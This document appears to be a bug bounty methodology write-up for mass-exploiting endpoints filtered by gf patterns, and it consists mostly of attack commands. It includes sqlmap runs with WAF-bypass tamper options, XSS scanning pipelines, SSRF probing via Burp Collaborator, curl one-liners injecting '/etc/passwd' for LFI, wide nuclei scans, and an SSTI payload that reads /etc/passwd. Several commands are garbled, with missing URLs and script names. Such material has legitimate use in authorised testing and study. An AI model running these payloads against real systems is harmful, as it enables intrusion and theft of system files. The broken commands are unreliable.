Now that we have sorted out endpoints based on gf patterns for SQLi, XSS, SSRF, LFI, and Open Redirect, let’s exploit them.


Feed it to sqlmap:

sqlmap -m sql --batch --random-agent --level 5 --risk 3 --tamper=between -v3 > sqlmap_output.txt

Try to figure out the SQL version and add it using --dbms flag.

WAF Bypass:

sqlmap -m --dbs --level=5 --risk=3 --user-agent -v3 --tamper="between,randomcase,space2comment" --batch -v3 > sqlmap_output.txt


For XSS, there are couple of ways to test it.

dalfox, xsstrike, and knoxss are the best ways to do it.


dalfox will help on automatically scanning for XSS.

We can install it as such:

└─$ export GOPROXY=
└─$ /usr/local/go/bin/go install

go: downloading v1.2.1
go: downloading v2.9.3

Running dalfox after running paramspider might be a good idea.

Let’s feed potentially XSS vulnerable URLs to dalfox:

cat gf_xss_uniq.txt | ~/go/bin/gf xss | sed 's/#,*/#/' | ~/go/bin/dalfox pipe -o output.txt    

![alt text]( 21-51-04.png)

alt text

If we want to get dalfox run faster, we can use multicast. Decide wisely on whether to use this flag or not based on your internet connection.

cat urls.txt | dalfox pipe --multicast -o xss.txt


python3 --seeds ~/Documents/bbh/dutch/gf_xss_uniq.txt --blind --file-log-level DEBUG --log-file ~/Documents/xss_log_2215.txt
python3 --seeds ~/Documents/bbh/dutch/gf_xss_uniq.txt 

For scanning single url:

xsstrike -f url

For scanning list of urls:

xsstrike --seeds xss -t 10 --blind (add your blind xss on /opt/xsstrike/core/

For generating blind xss payloads, use this

while IFS= read -r url; do
    echo "Testing URL: $url"
    python3 -u "$url"
done < ~/Documents/bbh/dutch/gf_xss_uniq.txt


Needs subscription. It is around $20 for 6 months.

I will definitely check it out later.


We can use couple of methods to validate SSRF.

  • FFuf with Burp Collaborator
  • SSRFMap
  • SSRF-Finder with surf
  • SSRF-King on Burp Suite

FFuf with Collaborator

Append burp collaborator payload to the URLs:

cat gf_ssrf_uniq.txt | /home/carabiner1/go/bin/qsreplace >> ssrf_collaborator_payload.txt

alt text

URLs are gonna look something like below:

alt text

Now run through URLs with burp collaborator through ffuf:

ffuf -c -w ssrf_collaborator_payload.txt -u FUZZ

alt text

xargs with Collaborator

cat wayback.txt | gf ssrf | sort -u |anew | httpx | qsreplace 'burpcollaborator_link' | xargs -I % -P 25 sh -c 'curl -ks "%" 2>&1 | grep "compute.internal" && echo "SSRF VULN! %"'

SSRF-Finder with Surf

surf allows you to filter a list of hosts, returning a list of viable SSRF candidates:

surf -l ssrf -t 10 -c 200

Feed it to SSRF-Finder:

cat ssrf | ssrf-finder



Feed it to lfimap:

sudo python3 lfimap/ --no-stop -F ~/Documents/bbh/nokia/urls/mass_lfi/gf_lfi_uniq.txt -a |& sudo tee -a ~/Documents/bbh/nokia/urls/mass_lfi/lfi_results3.txt 

alt text alt text


Testing for LFI with custom paths and regex:

httpx -l lfi -paths /root/LFI-files -threads 100 -random-agent -mc 200 -mr "root:[x*]:0:0:"

Purpose: Uses httpx to test multiple URLs in parallel for LFI vulnerabilities. The -paths option specifies a file with potential LFI paths, and -mr filters responses that contain a regex pattern indicating sensitive file access (like /etc/passwd contents

Using httpx with wordlist for LFI:

cat hosts | gau | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:"

Purpose: Combines gau (Get All URLs) with gf (grep filtering for patterns) to gather potential LFI paths. These paths are then tested using httpx with GET and POST methods and specified HTTP response patterns.


Basic LFI Detection with Nuclei Tags:

nuclei -l urls-his -c 200 -tags lfi

Purpose: Runs nuclei on URLs in the urls-his file, specifically targeting LFI vulnerabilities using templates tagged as LFI.

Advanced Vulnerability Scanning with Tags:

nuclei -c 500 -l urls.txt -t nuclei-templates/ -severity critical,high -ept ssl,tcp -tags cve,rce,log4j,grafana,tomcat,solar,apache,lfi,ssrf,sql,xxe,symfony,exposure,traversal,panel,default-login,confluence,vmware,vcenter -o url_results.txt

Purpose: Performs a broader scan using nuclei templates with various vulnerability tags and high-severity filters. This command detects a variety of vulnerabilities, including LFI, RCE, and XXE, with output saved to url_results.txt

Fuzzing with Nuclei Templates:

nuclei -l urls-his -c 200 -t fuzzing-templates -s critical,high

Purpose: Uses specific fuzzing templates in nuclei to test for high-severity vulnerabilities across multiple URLs. This is useful for identifying unexpected or complex attack vectors.

Using curl and waybackurls

Testing LFI via Wayback Machine URLs:

waybackurls | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Direct LFI Testing with cURL:

waybackurls | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Open Redirect


Append burp collaborator payload to the URLs:

cat gf_redirect_uniq.txt | /home/carabiner1/go/bin/qsreplace >> redirect_collaborator_payload.txt

Now run through URLs with burp collaborator through ffuf:

ffuf -c -w redirect_collaborator_payload.txt -u FUZZ


waybackurls | grep -a -i \=http | qsreplace '' | while read host do;do curl -s -L $host -I| grep "" && echo -e "$host \033[0;31mVulnerable\n" ;done


cat subs.txt| waybackurls | gf redirect | qsreplace '' | httpx -fr -title -match-string 'Example Domain'


gau []( | gf redirect | qsreplace “$LHOST” | xargs -I % -P 25 sh -c ‘curl -Is “%” 2>&1 | grep -q “Location: $LHOST” && echo “VULN! %”’


cat gf_ssti_uniq.txt  | ~/go/bin/qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | parallel -j50 -q curl -g | grep  "root:x"
for url in $(cat targets.txt); do python3 -u $url; print $url; done